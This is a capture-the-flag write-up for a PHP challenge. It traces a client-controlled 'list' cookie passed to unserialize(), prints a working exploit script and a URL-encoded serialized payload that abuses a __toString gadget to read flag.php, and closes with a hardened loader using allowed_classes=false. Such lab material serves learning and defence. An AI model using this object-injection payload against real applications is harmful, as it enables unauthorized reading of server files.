- Try to find the flag
- Access the URL. There is an input form; try submitting something.
- Notice that the cookie has changed: a key `list` has been added.
  ```
  a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22Hacked+by+smi1e%21%22%3B%7D
  ```
  URL-decoded:
  ```
  a:1:{i:0;s:16:"Hacked by smi1e!";}
  ```
  which means that the PHP code running on the server may look like this:
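  ```php
  $input = $_POST['a'];
  // The cookie is client-controlled, yet it is passed straight to unserialize()
  $inputs = unserialize($_COOKIE['list']);
  array_push($inputs, $input);
  // join() converts every element to a string, which invokes __toString() on objects
  echo join('', $inputs);
  ```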
- PHP object injection!
- Then we check the HTML source generated by index.php and find something interesting at the bottom:
  ```php
  #try to read flag.php
  Class whatthefuck{
      public function __toString()
      {
          return highlight_file($this->source,true);
      }
  }
  ```
- All we need to do is call the `__toString` method of class `whatthefuck` to read `flag.php`.
- Here is the final exploit.
  ```
  ➜ guess-the-code ls
  exploit.php flag.php
  ➜ guess-the-code cat exploit.php
  <?php
  #try to read flag.php
  Class whatthefuck{
      public function __toString()
      {
          return highlight_file($this->source,true);
      }
  }
  $x = new whatthefuck();
  $x->source='flag.php';
  $y = serialize(array($x));
  $z = unserialize($y);
  // local check: join() triggers __toString(), as in the guessed server code
  echo join('', $z);
  ```
  Put the following string in `$_COOKIE['list']`:
  ```
  a%3A1%3A%7Bi%3A0%3BO%3A11%3A%22whatthefuck%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D
  ```
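
For the defensive side of the guessed server code above, this added example (not part of the original write-up or the challenge source) contrasts the unsafe `unserialize()` of the `list` cookie with a hardened loader. The helper names `load_list_unsafe` and `load_list_safe` and the stubbed `__toString` body are assumptions made for illustration.

```php
<?php
// Added example; load_list_unsafe() and load_list_safe() are hypothetical helpers.

// Stand-in for the gadget class from index.php. The body is stubbed (assumption):
// the real class calls highlight_file($this->source, true).
class whatthefuck {
    public $source;
    public function __toString() {
        return "[would read {$this->source}]";
    }
}

// Pattern guessed in the write-up: any class named in the cookie is instantiated.
function load_list_unsafe(string $cookie): array {
    $inputs = unserialize($cookie);
    return is_array($inputs) ? $inputs : [];
}

// Hardened: objects are never instantiated and every element must be a string.
function load_list_safe(string $cookie): array {
    $inputs = @unserialize($cookie, ['allowed_classes' => false]);
    if (!is_array($inputs)) {
        return [];
    }
    foreach ($inputs as $item) {
        // Blocked objects arrive as __PHP_Incomplete_Class; reject the whole cookie.
        if (!is_string($item)) {
            return [];
        }
    }
    return array_values($inputs);
}

// Constructed sample cookie values (URL-decoded), copied from the write-up.
$samples = [
    'benign'  => 'a:1:{i:0;s:16:"Hacked by smi1e!";}',
    'payload' => 'a:1:{i:0;O:11:"whatthefuck":1:{s:6:"source";s:8:"flag.php";}}',
];

foreach ($samples as $name => $cookie) {
    printf("%-8s unsafe: %s\n", $name, join('', load_list_unsafe($cookie)));
    printf("%-8s safe:   %s\n", $name, join('', load_list_safe($cookie)));
}
```

Where possible, avoid `unserialize()` on client-supplied data altogether and keep the list as JSON or in the server-side session.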
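The reproduction environment for this challenge has not been authorized by the organizers or the challenge author. If it infringes on your rights, please contact me to have it removed (wangyihanger@gmail.com).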